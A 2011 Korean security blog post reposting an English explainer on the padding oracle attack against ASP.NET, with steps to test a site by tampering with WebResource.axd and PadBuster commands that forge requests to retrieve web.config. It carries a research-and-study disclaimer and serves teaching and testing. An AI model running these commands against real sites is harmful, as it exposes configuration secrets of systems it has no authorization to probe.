Padding oracle attack explained

위험한_친구들/뚱띵이_SQL 2011. 10. 19. 13:19

Padding oracle attack explained

In cryptography, the padding oracle attack is an attack on the CBC mode of operation, where the server leaks data about whether the padding of an encrypted message is correct or not. oracle refers to a mechanism in cryptography that can be used to determine whether a test has passed or failed. This information would help an attacker to decrypt and encrypt data without key.

How to find your .NET application is vulnerable to padding oracle attack or not?

    1. Using burp proxy capture a request to webresource.axd file
      Ex: http://somesite.com/webresource.axd?d=qmZbysenet6VGS94Ord8gQ2
    2. Change one character in the d value and send the request to the server. Observe the response.
    3. Send request to a non existent aspx page on the server. Observe the response.
      Ex: http://somesite.com/nonexist.aspx
    4. Response 2 and response 3 are differ, then it is possible to exploit the attack.

My OWASP presentation on 20-Aug-2011:

padbuster tool can be used to automate the padding oracle attack. This tool is a free ware and you can download it from – https://github.com/GDSSecurity/PadBuster/blob/master/padBuster.pl

* Perl is required to run padbuster. Perl can be downloaded from
http://strawberry-perl.googlecode.com/files/strawberry-perl-5.12.3.0.msi

Padbuster usage to attack .NET applications

  1. Encrypt web.config file –
    padBuster.pl http://somesite.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAAAA2
    AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config
  2. Brute force the first block-
    padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAA
    AAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -bruteforce –log
  3. Observe the log, at some point you will get 200 ok message, grab that URL and paste it in browser. It displays the web.config content.

Watch this video to get a better understanding of the attack:




[출처]
http://securitylearn.wordpress.com/2011/08/19/padding-oracle-attack-explained/



[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

저작자표시 비영리 변경금지

'위험한_친구들 > 뚱띵이_SQL' 카테고리의 다른 글

My-SQL을 이용한 Webshell 만들기  (0) 2012.02.28
SQL Injection Cheat Sheet  (0) 2011.10.13
Aqua Fold - Aqua Data Studio  (0) 2011.08.09
Posted by bitfox
l
블로그 이미지
작은여우와 암행어사 IT Security Consulting History bitfox

최근에 올라온 글

공지사항

글 보관함

최근에 받은 트랙백

  • Total :
  • Today :
  • Yesterday :
tistory 티스토리 가입하기!
rss

카테고리

분류 전체보기 (190)
Hello_World! (24)
위험한_친구들 (50)
수술_도구 (20)
생각하는_보안 (20)
삽질이라쓰고_경험이라_읽는다. (10)
글로벌_Gossip (28)
나의 관심 (10)
도전_리버서 (5)
도전_외래어 (5)
a Shot a Day (18)

달력

«   2024/04   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30

링크

티스토리툴바